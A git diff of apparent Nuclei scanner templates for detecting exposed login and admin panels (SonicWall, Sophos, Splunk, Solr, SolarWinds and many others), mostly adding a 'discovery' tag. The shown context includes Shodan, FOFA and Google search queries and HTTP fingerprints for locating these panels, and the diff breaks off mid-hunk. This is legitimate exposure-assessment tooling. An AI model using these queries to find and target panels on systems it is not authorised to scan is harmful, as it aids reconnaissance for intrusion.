a/http/exposed-panels/selenium-grid.yaml +++ b/http/exposed-panels/selenium-grid.yaml @@ -14,7 +14,7 @@ info: shodan-query: http.title:"Selenium Grid" product: selenium_grid vendor: selenium - tags: panel,unauth,selenium + tags: panel,unauth,selenium,discovery http: - method: GET diff --git a/http/exposed-panels/selenoid-ui-exposure.yaml b/http/exposed-panels/selenoid-ui-exposure.yaml index 84d8083239e..d1dd4a5fa7b 100644 --- a/http/exposed-panels/selenoid-ui-exposure.yaml +++ b/http/exposed-panels/selenoid-ui-exposure.yaml @@ -10,7 +10,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: panel + tags: panel,discovery http: - method: GET diff --git a/http/exposed-panels/selfcheck-panel.yaml b/http/exposed-panels/selfcheck-panel.yaml index a9f5c058852..87bcb70a2f4 100644 --- a/http/exposed-panels/selfcheck-panel.yaml +++ b/http/exposed-panels/selfcheck-panel.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 1 shodan-query: title:"SelfCheck System Manager" - tags: panel,login,selfcheck,systemmanager + tags: panel,login,selfcheck,systemmanager,discovery http: - method: GET diff --git a/http/exposed-panels/sensu-panel.yaml b/http/exposed-panels/sensu-panel.yaml index 3b69b0c413a..43a4307ecee 100644 --- a/http/exposed-panels/sensu-panel.yaml +++ b/http/exposed-panels/sensu-panel.yaml @@ -13,7 +13,7 @@ info: verified: true max-request: 1 shodan-query: http.favicon.hash:-749942143 - tags: panel,sensu,sumo,detect + tags: panel,sensu,sumo,detect,discovery http: - method: GET diff --git a/http/exposed-panels/sentinelone-console.yaml b/http/exposed-panels/sentinelone-console.yaml index f39e79c1e0b..bb49ba03bae 100644 --- a/http/exposed-panels/sentinelone-console.yaml +++ b/http/exposed-panels/sentinelone-console.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 shodan-query: title:"SentinelOne - Management Console" - tags: panel,sentinelone + tags: panel,sentinelone,discovery http: - method: GET diff --git a/http/exposed-panels/sentry-panel.yaml b/http/exposed-panels/sentry-panel.yaml index 8df085e09d3..553fa1d1ac7 100644 --- a/http/exposed-panels/sentry-panel.yaml +++ b/http/exposed-panels/sentry-panel.yaml @@ -20,7 +20,7 @@ info: - http.title:"login | sentry" fofa-query: title="login | sentry" google-query: intitle:"login | sentry" - tags: panel,sentry,login + tags: panel,sentry,login,discovery http: - method: GET diff --git a/http/exposed-panels/sequoiadb-login.yaml b/http/exposed-panels/sequoiadb-login.yaml index 9881f3760d3..5510f7a1c68 100644 --- a/http/exposed-panels/sequoiadb-login.yaml +++ b/http/exposed-panels/sequoiadb-login.yaml @@ -11,7 +11,7 @@ info: metadata: max-request: 1 shodan-query: http.title:"SequoiaDB" - tags: sequoiadb,panel,login + tags: sequoiadb,panel,login,discovery http: - method: GET diff --git a/http/exposed-panels/server-backup-login.yaml b/http/exposed-panels/server-backup-login.yaml index 420b85fe78c..0bc424447f4 100644 --- a/http/exposed-panels/server-backup-login.yaml +++ b/http/exposed-panels/server-backup-login.yaml @@ -12,7 +12,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: panel,paneil,idera,edb + tags: panel,paneil,idera,edb,discovery http: - method: GET diff --git a/http/exposed-panels/server-backup-manager-se.yaml b/http/exposed-panels/server-backup-manager-se.yaml index 4f05385150b..7d29a2b0358 100644 --- a/http/exposed-panels/server-backup-manager-se.yaml +++ b/http/exposed-panels/server-backup-manager-se.yaml @@ -11,7 +11,7 @@ info: metadata: max-request: 1 shodan-query: http.title:"Server Backup Manager SE" - tags: panel,server,backup,manager + tags: panel,server,backup,manager,discovery http: - method: GET diff --git a/http/exposed-panels/servicedesk-login-panel.yaml b/http/exposed-panels/servicedesk-login-panel.yaml index 56b2db0684d..1bf00ce6f41 100644 --- a/http/exposed-panels/servicedesk-login-panel.yaml +++ b/http/exposed-panels/servicedesk-login-panel.yaml @@ -17,7 +17,7 @@ info: - http.component:"Atlassian Confluence" - http.component:"atlassian confluence" fofa-query: app="atlassian-confluence" - tags: servicedesk,confluence,jira,panel,login,atlassian + tags: servicedesk,confluence,jira,panel,login,atlassian,discovery http: - method: GET diff --git a/http/exposed-panels/servicenow-panel.yaml b/http/exposed-panels/servicenow-panel.yaml index 39feee014b5..7924232b650 100644 --- a/http/exposed-panels/servicenow-panel.yaml +++ b/http/exposed-panels/servicenow-panel.yaml @@ -22,7 +22,7 @@ info: - icon_hash=1701804003 - title="servicenow" google-query: intitle:"servicenow" - tags: panel,servicenow,login,detect + tags: panel,servicenow,login,detect,discovery http: - method: GET diff --git a/http/exposed-panels/sevone-nms-network-manager.yaml b/http/exposed-panels/sevone-nms-network-manager.yaml index 0567b6226fa..ff93465aa16 100644 --- a/http/exposed-panels/sevone-nms-network-manager.yaml +++ b/http/exposed-panels/sevone-nms-network-manager.yaml @@ -8,7 +8,7 @@ info: verified: true max-request: 1 shodan-query: http.title:"SevOne NMS - Network Manager" - tags: sevone,manager,login,panel + tags: sevone,manager,login,panel,discovery http: - method: GET diff --git a/http/exposed-panels/sgp-login-panel.yaml b/http/exposed-panels/sgp-login-panel.yaml index 943108c6f79..a9d5e73022b 100644 --- a/http/exposed-panels/sgp-login-panel.yaml +++ b/http/exposed-panels/sgp-login-panel.yaml @@ -11,7 +11,7 @@ info: metadata: max-request: 1 shodan-query: http.title:"SGP" - tags: panel,sgp + tags: panel,sgp,discovery http: - method: GET diff --git a/http/exposed-panels/shardingsphere-panel.yaml b/http/exposed-panels/shardingsphere-panel.yaml index 03188dead75..9f471d257e9 100644 --- a/http/exposed-panels/shardingsphere-panel.yaml +++ b/http/exposed-panels/shardingsphere-panel.yaml @@ -15,7 +15,7 @@ info: product: shardingsphere_elasticjob-ui shodan-query: http.favicon.hash:816588900 fofa-query: icon_hash=816588900 - tags: panel,shardingsphere,login,apache + tags: panel,shardingsphere,login,apache,discovery http: - method: GET diff --git a/http/exposed-panels/sharecenter-login.yaml b/http/exposed-panels/sharecenter-login.yaml index 0d77dad4103..4a5383489b9 100644 --- a/http/exposed-panels/sharecenter-login.yaml +++ b/http/exposed-panels/sharecenter-login.yaml @@ -12,7 +12,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: edb,panel,login + tags: edb,panel,login,discovery http: - method: GET diff --git a/http/exposed-panels/sharefile-panel.yaml b/http/exposed-panels/sharefile-panel.yaml index add120a6ed6..994052cdfba 100644 --- a/http/exposed-panels/sharefile-panel.yaml +++ b/http/exposed-panels/sharefile-panel.yaml @@ -20,7 +20,7 @@ info: - http.title:"sharefile login" fofa-query: title="sharefile login" google-query: intitle:"sharefile login" - tags: sharefile,login,panel,detect,citrix + tags: sharefile,login,panel,detect,citrix,discovery http: - method: GET diff --git a/http/exposed-panels/shell-box.yaml b/http/exposed-panels/shell-box.yaml index 25f8937c095..e73204c214c 100644 --- a/http/exposed-panels/shell-box.yaml +++ b/http/exposed-panels/shell-box.yaml @@ -18,7 +18,7 @@ info: product: shellinabox shodan-query: http.favicon.hash:-629968763 fofa-query: icon_hash=-629968763 - tags: shell,emulator,detect,panel,login,shellinabox_project + tags: shell,emulator,detect,panel,login,shellinabox_project,discovery http: - method: GET diff --git a/http/exposed-panels/shoutcast-server.yaml b/http/exposed-panels/shoutcast-server.yaml index df9d692f54e..4681abc8130 100644 --- a/http/exposed-panels/shoutcast-server.yaml +++ b/http/exposed-panels/shoutcast-server.yaml @@ -14,7 +14,7 @@ info: shodan-query: http.title:"SHOUTcast Server" product: dnas vendor: shoutcast - tags: panel + tags: panel,discovery http: - method: GET diff --git a/http/exposed-panels/sicom-panel.yaml b/http/exposed-panels/sicom-panel.yaml index f303abbbee2..b60784980c3 100644 --- a/http/exposed-panels/sicom-panel.yaml +++ b/http/exposed-panels/sicom-panel.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-668 metadata: max-request: 1 - tags: sicom,mgrng,panel + tags: sicom,mgrng,panel,discovery http: - method: GET diff --git a/http/exposed-panels/sidekiq-dashboard.yaml b/http/exposed-panels/sidekiq-dashboard.yaml index 24bf06992cd..e1949fbbe1e 100644 --- a/http/exposed-panels/sidekiq-dashboard.yaml +++ b/http/exposed-panels/sidekiq-dashboard.yaml @@ -21,7 +21,7 @@ info: fofa-query: title="sidekiq" shodan-query: http.title:"sidekiq" google-query: intitle:"sidekiq" - tags: unauth,panel,sidekiq,contribsys + tags: unauth,panel,sidekiq,contribsys,discovery http: - method: GET diff --git a/http/exposed-panels/signet-explorer-dashboard.yaml b/http/exposed-panels/signet-explorer-dashboard.yaml index 02faaa2dab3..ae01884f4a1 100644 --- a/http/exposed-panels/signet-explorer-dashboard.yaml +++ b/http/exposed-panels/signet-explorer-dashboard.yaml @@ -14,7 +14,7 @@ info: verified: true max-request: 1 shodan-query: html:"mempool-space" || title:"Signet Explorer" - tags: panel,signet,bitcoin,dashboard + tags: panel,signet,bitcoin,dashboard,discovery http: - method: GET diff --git a/http/exposed-panels/sitecore-login-panel.yaml b/http/exposed-panels/sitecore-login-panel.yaml index 24b5faca4cd..208da45200c 100644 --- a/http/exposed-panels/sitecore-login-panel.yaml +++ b/http/exposed-panels/sitecore-login-panel.yaml @@ -10,7 +10,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: panel,sitecore,login + tags: panel,sitecore,login,discovery http: - method: GET diff --git a/http/exposed-panels/sitecore-login.yaml b/http/exposed-panels/sitecore-login.yaml index fa09f2dd7ce..675283bb958 100644 --- a/http/exposed-panels/sitecore-login.yaml +++ b/http/exposed-panels/sitecore-login.yaml @@ -14,7 +14,7 @@ info: shodan-query: http.title:"Welcome to Sitecore" product: experience_platform vendor: sitecore - tags: panel,sitecore + tags: panel,sitecore,discovery http: - method: GET diff --git a/http/exposed-panels/sitefinity-login.yaml b/http/exposed-panels/sitefinity-login.yaml index 41d19f22d5a..4517ea18846 100644 --- a/http/exposed-panels/sitefinity-login.yaml +++ b/http/exposed-panels/sitefinity-login.yaml @@ -13,7 +13,7 @@ info: max-request: 1 vendor: progress product: sitefinity_cms - tags: sitefinity,edb,panel,progress + tags: sitefinity,edb,panel,progress,discovery http: - method: GET diff --git a/http/exposed-panels/siteomat-login.yaml b/http/exposed-panels/siteomat-login.yaml index 8d73af0ab70..0954180311b 100644 --- a/http/exposed-panels/siteomat-login.yaml +++ b/http/exposed-panels/siteomat-login.yaml @@ -15,7 +15,7 @@ info: max-request: 1 vendor: orpak product: siteomat - tags: siteomat,login,edb,panel,orpak + tags: siteomat,login,edb,panel,orpak,discovery http: - method: GET diff --git a/http/exposed-panels/skeepers-panel.yaml b/http/exposed-panels/skeepers-panel.yaml index a6f4b9ce484..ad36dc1c343 100644 --- a/http/exposed-panels/skeepers-panel.yaml +++ b/http/exposed-panels/skeepers-panel.yaml @@ -1,5 +1,5 @@ -id: skeepers-panel - +id: skeepers-panel + info: name: Skeepers Login Panel - Detect author: righettod @@ -12,27 +12,27 @@ info: verified: true max-request: 2 shodan-query: http.title:"Skeepers" - tags: panel,skeepers,login,detect + tags: panel,skeepers,login,detect,discovery -http: - - method: GET - path: - - "{{BaseURL}}/backend/login" - - "{{BaseURL}}" - - stop-at-first-match: true - - matchers: - - type: dsl - dsl: - - 'status_code == 200' - - 'contains(to_lower(body), "skeepers") && contains(to_lower(body), "login")' - condition: and - - extractors: - - type: regex - part: body - group: 1 - regex: +http: + - method: GET + path: + - "{{BaseURL}}/backend/login" + - "{{BaseURL}}" + + stop-at-first-match: true + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(to_lower(body), "skeepers") && contains(to_lower(body), "login")' + condition: and + + extractors: + - type: regex + part: body + group: 1 + regex: - 'Version\s+([0-9\.]+)\s+-' # digest: 4a0a00473045022100ac732f34a0c6946a1d3929d4228d4cf30516b41d9c37559cab570f5ef67c8b2202205f8bbdafdb7636d6b59a5a4d7ebeb090cb97b2c1f4bac6d1294e6385c9c27517:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/skycaiji-admin-panel.yaml b/http/exposed-panels/skycaiji-admin-panel.yaml index 5f8325f8e8a..e5f6647186b 100644 --- a/http/exposed-panels/skycaiji-admin-panel.yaml +++ b/http/exposed-panels/skycaiji-admin-panel.yaml @@ -13,7 +13,7 @@ info: max-request: 1 vendor: skycaiji product: skycaiji - tags: panel,tech,skycaiji + tags: panel,tech,skycaiji,discovery http: - method: GET diff --git a/http/exposed-panels/skysea-panel.yaml b/http/exposed-panels/skysea-panel.yaml index 5dc92769ae1..d78eda0670e 100644 --- a/http/exposed-panels/skysea-panel.yaml +++ b/http/exposed-panels/skysea-panel.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 shodan-query: http.favicon.hash:385597939 - tags: panel,skysea,detect,login + tags: panel,skysea,detect,login,discovery http: - method: GET diff --git a/http/exposed-panels/slocum-login.yaml b/http/exposed-panels/slocum-login.yaml index c492ce05b41..3fd3bc9167b 100644 --- a/http/exposed-panels/slocum-login.yaml +++ b/http/exposed-panels/slocum-login.yaml @@ -10,7 +10,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: panel,tech,slocum + tags: panel,tech,slocum,discovery http: - method: GET diff --git a/http/exposed-panels/smartping-dashboard.yaml b/http/exposed-panels/smartping-dashboard.yaml index f5de1bfe6e1..dc28a535d88 100644 --- a/http/exposed-panels/smartping-dashboard.yaml +++ b/http/exposed-panels/smartping-dashboard.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 shodan-query: title:"SmartPing Dashboard" - tags: panel,misconfig,unauth,smartping + tags: panel,misconfig,unauth,smartping,discovery http: - method: GET diff --git a/http/exposed-panels/snapcomms-panel.yaml b/http/exposed-panels/snapcomms-panel.yaml index c04010d7f78..428cdae983c 100644 --- a/http/exposed-panels/snapcomms-panel.yaml +++ b/http/exposed-panels/snapcomms-panel.yaml @@ -11,7 +11,7 @@ info: metadata: verified: true max-request: 1 - tags: panel,snapcomms,login,detect + tags: panel,snapcomms,login,detect,discovery http: - method: GET diff --git a/http/exposed-panels/softether-vpn-panel.yaml b/http/exposed-panels/softether-vpn-panel.yaml index 7c4824287b4..777e0d655d5 100644 --- a/http/exposed-panels/softether-vpn-panel.yaml +++ b/http/exposed-panels/softether-vpn-panel.yaml @@ -14,7 +14,7 @@ info: vendor: softether product: vpn shodan-query: http.title:"SoftEther VPN Server" - tags: panel,vpn,softether + tags: panel,vpn,softether,discovery http: - method: GET diff --git a/http/exposed-panels/solarview-compact-panel.yaml b/http/exposed-panels/solarview-compact-panel.yaml index 794cb2bbc43..49f99017941 100644 --- a/http/exposed-panels/solarview-compact-panel.yaml +++ b/http/exposed-panels/solarview-compact-panel.yaml @@ -23,7 +23,7 @@ info: - body="solarview compact" && title="top" - icon_hash="-244067125" - body="solarview compact" - tags: panel,solarview,iot,contec + tags: panel,solarview,iot,contec,discovery http: - method: GET diff --git a/http/exposed-panels/solarwinds-arm-panel.yaml b/http/exposed-panels/solarwinds-arm-panel.yaml index 8e7e3376e36..3bcff30e512 100644 --- a/http/exposed-panels/solarwinds-arm-panel.yaml +++ b/http/exposed-panels/solarwinds-arm-panel.yaml @@ -22,7 +22,7 @@ info: - services.http.response.html_title="Solarwinds Access Rights Manager" - services.http.response.html_title="solarwinds access rights manager" fofa-query: icon_hash=-1416464161 - tags: panel,solarwinds + tags: panel,solarwinds,discovery http: - method: GET diff --git a/http/exposed-panels/solarwinds-orion.yaml b/http/exposed-panels/solarwinds-orion.yaml index cef08f4d3af..2be9d3ec6c2 100644 --- a/http/exposed-panels/solarwinds-orion.yaml +++ b/http/exposed-panels/solarwinds-orion.yaml @@ -13,7 +13,7 @@ info: max-request: 1 vendor: solarwinds product: orion_platform - tags: panel,solarwinds + tags: panel,solarwinds,discovery http: - method: GET diff --git a/http/exposed-panels/solarwinds-servuftp-detect.yaml b/http/exposed-panels/solarwinds-servuftp-detect.yaml index f42cfb636c1..644fa119c6b 100644 --- a/http/exposed-panels/solarwinds-servuftp-detect.yaml +++ b/http/exposed-panels/solarwinds-servuftp-detect.yaml @@ -14,7 +14,7 @@ info: vendor: solarwinds product: serv-u shodan-query: product:"rhinosoft serv-u httpd" - tags: solarwinds,panel + tags: solarwinds,panel,discovery http: - method: GET diff --git a/http/exposed-panels/solr-panel-exposure.yaml b/http/exposed-panels/solr-panel-exposure.yaml index 5ca3bb3464b..a7397d6a129 100644 --- a/http/exposed-panels/solr-panel-exposure.yaml +++ b/http/exposed-panels/solr-panel-exposure.yaml @@ -25,7 +25,7 @@ info: google-query: - intitle:"apache solr" - intitle:"solr admin" - tags: panel,solr,apache,admin + tags: panel,solr,apache,admin,discovery http: - method: GET diff --git a/http/exposed-panels/somansa-dlp-detect.yaml b/http/exposed-panels/somansa-dlp-detect.yaml index 9d500ee4388..dfae22d299c 100644 --- a/http/exposed-panels/somansa-dlp-detect.yaml +++ b/http/exposed-panels/somansa-dlp-detect.yaml @@ -14,7 +14,7 @@ info: verified: true max-request: 2 shodan-query: http.html:"DLP system" - tags: panel,somansa,dlp + tags: panel,somansa,dlp,discovery http: - method: GET diff --git a/http/exposed-panels/somfy-login.yaml b/http/exposed-panels/somfy-login.yaml index e920b99e025..23393327098 100644 --- a/http/exposed-panels/somfy-login.yaml +++ b/http/exposed-panels/somfy-login.yaml @@ -10,7 +10,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: panel,login + tags: panel,login,discovery http: - method: GET diff --git a/http/exposed-panels/sonarqube-login.yaml b/http/exposed-panels/sonarqube-login.yaml index c177efbfc1b..a34e741ae8a 100644 --- a/http/exposed-panels/sonarqube-login.yaml +++ b/http/exposed-panels/sonarqube-login.yaml @@ -13,7 +13,7 @@ info: max-request: 1 vendor: sonarsource product: sonarqube - tags: panel,sonarqube,sonarsource + tags: panel,sonarqube,sonarsource,discovery http: - method: GET diff --git a/http/exposed-panels/sonic-wall-application.yaml b/http/exposed-panels/sonic-wall-application.yaml index 8cc400ca5c0..4715f8c7436 100644 --- a/http/exposed-panels/sonic-wall-application.yaml +++ b/http/exposed-panels/sonic-wall-application.yaml @@ -19,7 +19,7 @@ info: - http.title:"appliance management console login" fofa-query: title="appliance management console login" google-query: intitle:"appliance management console login" - tags: panel,sonicwall,login + tags: panel,sonicwall,login,discovery http: - method: GET diff --git a/http/exposed-panels/sonic-wall-login.yaml b/http/exposed-panels/sonic-wall-login.yaml index c90a5f51d68..aef4e940ae4 100644 --- a/http/exposed-panels/sonic-wall-login.yaml +++ b/http/exposed-panels/sonic-wall-login.yaml @@ -17,7 +17,7 @@ info: - http.title:"sonicwall network security login" fofa-query: title="sonicwall network security login" google-query: intitle:"sonicwall network security login" - tags: panel,sonicwall,login + tags: panel,sonicwall,login,discovery http: - method: GET diff --git a/http/exposed-panels/sonicwall-analyzer-login.yaml b/http/exposed-panels/sonicwall-analyzer-login.yaml index 7378e37dfa9..8d8b251f254 100644 --- a/http/exposed-panels/sonicwall-analyzer-login.yaml +++ b/http/exposed-panels/sonicwall-analyzer-login.yaml @@ -19,7 +19,7 @@ info: - http.title:"sonicwall analyzer login" fofa-query: title="sonicwall analyzer login" google-query: intitle:"sonicwall analyzer login" - tags: panel,sonicwall + tags: panel,sonicwall,discovery http: - method: GET diff --git a/http/exposed-panels/sonicwall-management-panel.yaml b/http/exposed-panels/sonicwall-management-panel.yaml index 0e7bf4f525b..dba510b9481 100644 --- a/http/exposed-panels/sonicwall-management-panel.yaml +++ b/http/exposed-panels/sonicwall-management-panel.yaml @@ -13,7 +13,7 @@ info: max-request: 1 vendor: sonicwall product: global_management_system - tags: panel,sonicwall + tags: panel,sonicwall,discovery http: - method: GET diff --git a/http/exposed-panels/sonicwall-sslvpn-panel.yaml b/http/exposed-panels/sonicwall-sslvpn-panel.yaml index 7b289d010db..552d28fc2b3 100644 --- a/http/exposed-panels/sonicwall-sslvpn-panel.yaml +++ b/http/exposed-panels/sonicwall-sslvpn-panel.yaml @@ -14,7 +14,7 @@ info: vendor: sonicwall product: sonicos google-query: inurl:"auth.html" intitle:"sonicwall" - tags: panel,sonicwall + tags: panel,sonicwall,discovery http: - method: GET diff --git a/http/exposed-panels/sophos-fw-version-detect.yaml b/http/exposed-panels/sophos-fw-version-detect.yaml index acd38aeaece..8c93df7dead 100644 --- a/http/exposed-panels/sophos-fw-version-detect.yaml +++ b/http/exposed-panels/sophos-fw-version-detect.yaml @@ -19,7 +19,7 @@ info: - http.title:"sophos" fofa-query: title="sophos" google-query: intitle:"sophos" - tags: panel,sophos + tags: panel,sophos,discovery http: - method: GET diff --git a/http/exposed-panels/sophos-mobile-panel.yaml b/http/exposed-panels/sophos-mobile-panel.yaml index c7d5b6b4cce..5778ee3fa4d 100644 --- a/http/exposed-panels/sophos-mobile-panel.yaml +++ b/http/exposed-panels/sophos-mobile-panel.yaml @@ -24,7 +24,7 @@ info: - icon_hash=-1274798165 - title="sophos mobile" google-query: intitle:"sophos mobile" - tags: panel,sophos + tags: panel,sophos,discovery http: - method: GET diff --git a/http/exposed-panels/sophos-web-appliance.yaml b/http/exposed-panels/sophos-web-appliance.yaml index bc16186b1eb..ff2cff5d04e 100644 --- a/http/exposed-panels/sophos-web-appliance.yaml +++ b/http/exposed-panels/sophos-web-appliance.yaml @@ -20,7 +20,7 @@ info: - title="sophos web appliance" - icon_hash=-893681401 google-query: intitle:"sophos web appliance" - tags: panel,login,sophos + tags: panel,login,sophos,discovery http: - method: GET diff --git a/http/exposed-panels/spacelogic-cbus-panel.yaml b/http/exposed-panels/spacelogic-cbus-panel.yaml index 125b502445d..b80022a6b57 100644 --- a/http/exposed-panels/spacelogic-cbus-panel.yaml +++ b/http/exposed-panels/spacelogic-cbus-panel.yaml @@ -13,7 +13,7 @@ info: - html:"SpaceLogic C-Bus" - http.html:"spacelogic c-bus" fofa-query: body="spacelogic c-bus" - tags: panel,spacelogic,login,schneider-electric + tags: panel,spacelogic,login,schneider-electric,discovery http: - method: GET diff --git a/http/exposed-panels/spark-panel.yaml b/http/exposed-panels/spark-panel.yaml index 06f9e9d634a..fbc2902636e 100644 --- a/http/exposed-panels/spark-panel.yaml +++ b/http/exposed-panels/spark-panel.yaml @@ -24,7 +24,7 @@ info: - title="spark master at" - body="/apps/imt/html/" google-query: intitle:"spark master at" - tags: panel,spark,apache + tags: panel,spark,apache,discovery http: - method: GET diff --git a/http/exposed-panels/speedtest-panel.yaml b/http/exposed-panels/speedtest-panel.yaml index 520bb5f616b..9ff6acaf707 100644 --- a/http/exposed-panels/speedtest-panel.yaml +++ b/http/exposed-panels/speedtest-panel.yaml @@ -17,7 +17,7 @@ info: vendor: speed_test_project product: speed_test shodan-query: title:"Speedtest Tracker" - tags: speedtest,tracker,panel,login + tags: speedtest,tracker,panel,login,discovery http: - method: GET diff --git a/http/exposed-panels/sphider-login.yaml b/http/exposed-panels/sphider-login.yaml index 8a9a2b9fb24..dd8d70dce7f 100644 --- a/http/exposed-panels/sphider-login.yaml +++ b/http/exposed-panels/sphider-login.yaml @@ -15,7 +15,7 @@ info: max-request: 3 vendor: sphider product: sphider - tags: edb,panel,sphider + tags: edb,panel,sphider,discovery http: - method: GET diff --git a/http/exposed-panels/sphinxonline-panel.yaml b/http/exposed-panels/sphinxonline-panel.yaml index 79b178ebf39..ec97255a86f 100644 --- a/http/exposed-panels/sphinxonline-panel.yaml +++ b/http/exposed-panels/sphinxonline-panel.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 shodan-query: http.title:"Connection - SphinxOnline" - tags: panel,sphinxonline,login,detect + tags: panel,sphinxonline,login,detect,discovery http: - method: GET diff --git a/http/exposed-panels/spiderfoot.yaml b/http/exposed-panels/spiderfoot.yaml index 8692487c7c3..cc885d99bfb 100644 --- a/http/exposed-panels/spiderfoot.yaml +++ b/http/exposed-panels/spiderfoot.yaml @@ -10,7 +10,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: panel,login,tech,spiderfoot + tags: panel,login,tech,spiderfoot,discovery http: - method: GET diff --git a/http/exposed-panels/splunk-enterprise-panel.yaml b/http/exposed-panels/splunk-enterprise-panel.yaml index fa46487d0fd..762c3f2ebe8 100644 --- a/http/exposed-panels/splunk-enterprise-panel.yaml +++ b/http/exposed-panels/splunk-enterprise-panel.yaml @@ -20,7 +20,7 @@ info: - http.title:"login - splunk" fofa-query: title="login - splunk" google-query: intitle:"login - splunk" - tags: panel,splunk + tags: panel,splunk,discovery http: - method: GET diff --git a/http/exposed-panels/splunk-login.yaml b/http/exposed-panels/splunk-login.yaml index 4b1c66aa3c1..f0019a877ca 100644 --- a/http/exposed-panels/splunk-login.yaml +++ b/http/exposed-panels/splunk-login.yaml @@ -11,7 +11,7 @@ info: metadata: max-request: 1 shodan-query: http.title:"Splunk SOAR" - tags: panel,splunk + tags: panel,splunk,discovery http: - method: GET diff --git a/http/exposed-panels/spotweb-login-panel.yaml b/http/exposed-panels/spotweb-login-panel.yaml index 58eb744f6f3..ae50b6afc98 100644 --- a/http/exposed-panels/spotweb-login-panel.yaml +++ b/http/exposed-panels/spotweb-login-panel.yaml @@ -16,7 +16,7 @@ info: - http.title:"spotweb - overview" fofa-query: title="spotweb - overview" google-query: intitle:"spotweb - overview" - tags: panel,spotweb,detect,spotweb_project + tags: panel,spotweb,detect,spotweb_project,discovery http: - method: GET diff --git a/http/exposed-panels/sql-monitor.yaml b/http/exposed-panels/sql-monitor.yaml index 0f60a4ca17a..27e3612c068 100644 --- a/http/exposed-panels/sql-monitor.yaml +++ b/http/exposed-panels/sql-monitor.yaml @@ -17,7 +17,7 @@ info: - html:"SQL Monitor" - http.html:"sql monitor" fofa-query: body="sql monitor" - tags: panel,red-gate + tags: panel,red-gate,discovery http: - method: GET diff --git a/http/exposed-panels/sqlbuddy-panel.yaml b/http/exposed-panels/sqlbuddy-panel.yaml index 1619ee9fcf1..1f5c6e6ac79 100644 --- a/http/exposed-panels/sqlbuddy-panel.yaml +++ b/http/exposed-panels/sqlbuddy-panel.yaml @@ -18,7 +18,7 @@ info: shodan-query: http.title:"SQL Buddy" product: sql_buddy vendor: sqlbuddy - tags: panel,sqlbuddy + tags: panel,sqlbuddy,discovery http: - method: GET diff --git a/http/exposed-panels/sqlpad-panel.yaml b/http/exposed-panels/sqlpad-panel.yaml index 0dc2085da03..6c485092275 100644 --- a/http/exposed-panels/sqlpad-panel.yaml +++ b/http/exposed-panels/sqlpad-panel.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 fofa-query: "SQLPad" - tags: panel,login,sqlpad,detect + tags: panel,login,sqlpad,detect,discovery http: - method: GET diff --git a/http/exposed-panels/squidex-panel.yaml b/http/exposed-panels/squidex-panel.yaml index fc76d530c40..b4540712be7 100644 --- a/http/exposed-panels/squidex-panel.yaml +++ b/http/exposed-panels/squidex-panel.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 shodan-query: http.favicon.hash:1099097618 - tags: panel,squidex,login + tags: panel,squidex,login,discovery http: - method: GET diff --git a/http/exposed-panels/squirrelmail-login.yaml b/http/exposed-panels/squirrelmail-login.yaml index be754748473..80af60ab269 100644 --- a/http/exposed-panels/squirrelmail-login.yaml +++ b/http/exposed-panels/squirrelmail-login.yaml @@ -21,7 +21,7 @@ info: - cpe:"cpe:2.3:a:squirrelmail:squirrelmail" fofa-query: title="squirrelmail" google-query: intitle:"squirrelmail" - tags: squirrelmail,edb,panel + tags: squirrelmail,edb,panel,discovery http: - method: GET diff --git a/http/exposed-panels/sqwebmail-login-panel.yaml b/http/exposed-panels/sqwebmail-login-panel.yaml index 8d39692385b..0c12a2ba249 100644 --- a/http/exposed-panels/sqwebmail-login-panel.yaml +++ b/http/exposed-panels/sqwebmail-login-panel.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 2 shodan-query: title:"SqWebMail" - tags: webmail,sqwebmail,panel + tags: webmail,sqwebmail,panel,discovery http: - method: GET diff --git a/http/exposed-panels/star-network-utility.yaml b/http/exposed-panels/star-network-utility.yaml index ea5c36a133c..1c00968d06c 100644 --- a/http/exposed-panels/star-network-utility.yaml +++ b/http/exposed-panels/star-network-utility.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 shodan-query: http.html:"Network Utility" - tags: panel,utility + tags: panel,utility,discovery http: - method: GET diff --git a/http/exposed-panels/start-element-manager-panel.yaml b/http/exposed-panels/start-element-manager-panel.yaml index eb107660ff1..75573b80630 100644 --- a/http/exposed-panels/start-element-manager-panel.yaml +++ b/http/exposed-panels/start-element-manager-panel.yaml @@ -10,7 +10,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: panel + tags: panel,discovery http: - method: GET diff --git a/http/exposed-panels/steve-login-panel.yaml b/http/exposed-panels/steve-login-panel.yaml index c5bfda58126..ca07e10346f 100644 --- a/http/exposed-panels/steve-login-panel.yaml +++ b/http/exposed-panels/steve-login-panel.yaml @@ -19,7 +19,7 @@ info: google-query: intitle:"SteVe - Steckdosenverwaltung" product: steve vendor: steve-community - tags: panel,steve + tags: panel,steve,discovery http: - method: GET diff --git a/http/exposed-panels/stirling-pdf-panel.yaml b/http/exposed-panels/stirling-pdf-panel.yaml index d2e6b01a2d9..e88d0fdbffc 100644 --- a/http/exposed-panels/stirling-pdf-panel.yaml +++ b/http/exposed-panels/stirling-pdf-panel.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 fofa-query: title="StirlingPDF" - tags: panel,login,stirling-pdf,detect + tags: panel,login,stirling-pdf,detect,discovery http: - method: GET diff --git a/http/exposed-panels/storybook-panel.yaml b/http/exposed-panels/storybook-panel.yaml index 004a66329b3..43ffb2ccf27 100644 --- a/http/exposed-panels/storybook-panel.yaml +++ b/http/exposed-panels/storybook-panel.yaml @@ -15,7 +15,7 @@ info: verified: true max-request: 2 shodan-query: http.title:"storybook" - 